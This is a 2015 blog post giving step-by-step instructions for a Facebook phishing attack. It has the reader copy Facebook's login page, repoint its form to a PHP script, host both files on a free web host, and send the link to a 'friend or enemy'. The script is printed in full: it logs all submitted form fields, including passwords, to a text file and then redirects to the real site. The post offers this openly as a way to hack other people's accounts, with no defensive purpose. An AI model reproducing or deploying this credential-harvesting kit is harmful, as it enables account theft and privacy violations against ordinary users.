#blog-pager{clear:both;margin:30px auto; padding: 7px; text-align:center;font-size: 11px;background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #000000),color-stop(1, #292929));background-image: -o-linear-gradient(top, #000000 0%, #292929 100%);background-image: -moz-linear-gradient(top, #000000 0%, #292929 100%);background-image: -webkit-linear-gradient(top, #000000 0%, #292929 100%);background-image: -ms-linear-gradient(top, #000000 0%, #292929 100%);background-image: linear-gradient(to top, #000000 0%, #292929 100%); padding: 6px;-webkit-border-radius: 3px;-moz-border-radius: 3px;border-radius: 3px;} .blog-pager {background: none;} .displaypageNum a,.showpage a,.pagecurrent{padding: 3px 10px;margin-right:5px; color: #fff;} .displaypageNum a:hover,.showpage a:hover,.pagecurrent{background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #59A2CF),color-stop(1, #D9EAFF));background-image: -o-linear-gradient(top, #59A2CF 0%, #D9EAFF 100%);background-image: -moz-linear-gradient(top, #59A2CF 0%, #D9EAFF 100%);background-image: -webkit-linear-gradient(top, #59A2CF 0%, #D9EAFF 100%);background-image: -ms-linear-gradient(top, #59A2CF 0%, #D9EAFF 100%);background-image: linear-gradient(to top, #59A2CF 0%, #D9EAFF 100%);text-decoration: none;color: #000;-webkit-border-radius: 3px;-moz-border-radius: 3px;border-radius: 3px;} .showpageOf{display:none!important}.blog-pager-older-link, .home-link, .blog-pager-newer-link {background: transparent;} a.blog-pager-older-link, a.home-link, a.blog-pager-newer-link {color: #fff;} #blog-pager .pages{border:none;background: none;} Style 4: numbered page navigation style 4

ads

Saturday 1 August 2015

Phishing trick for FB

Steps:-


1) Go to the PC browser open Fb.


2) Right click on FB main page and select view page source.


3) Copy that whole text and paste it in your notepad.


4) Now to go to your notepad and press CTRL + F and type ACTION.


( If it will not be found scroll up your page from down to top then press CTRL + F and Type ACTION.)


5) You will find text like this action="https://www.facebook.com/login.php?  login attempt=1"


5) Replace that text from post.php .


6) Now it will be like action="post.php".


7) Save it as index.htm .


8) Open notepad and copy below text in notepad.




<?php

header ('Location:http://www.facebook.com');

$handle = fopen("usernames.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


9) Save it as post.php .


10) Now you have 2 HTML file keep it safe.


11) Go to

000webhosting.com


12) Register an account than after all confirmation go to file manager which is present in control panel.


( If the file manager will not open select another file manger option.)


13) After that click on public html and select default php and delete it after that upload both the file index.htm and post.php .


14)  After uploading double click on index.htm the page will be redirected to facebook page that is made by you.


15) Copy that URL and sent it your friend or your enemy to hack his or her FB ID.


When your friend login through your page his or her FB ID password will be tracked.


16) To see your friend password login to 000webhost website select control panel->File manager-> Public html.


17) You will find new file named as username.txt .


Congratulation your enemy or friend FB ID is hacked.

No comments:

Post a Comment

Configuration After installing, you might want to change these default settings: perPage: 7, numPages: 6, var firstText ='First'; var lastText ='Last'; var prevText ='« Previous'; var nextText ='Next »'; } 1) perPage: how many posts will be shown in each page (7). This value has to be the same as the number of posts on the main page. Otherwise, add the same number by going to "Settings" > "Formatting" and type it in the "Show at most" field, then click on the "Save Settings" button. 2) numPages: how many pages will be shown in the page navigation (6) 3) to replace the 'First', 'Last', "« Previous" and "Next »" texts, just type your own within the quotes. Labels fix: By default, Blogger will show 20 posts on label pages. To make this widget appear on label pages, we will have to cut down this down to the value that we gave for the perPage variable. Find each occurrence of the following code snippet: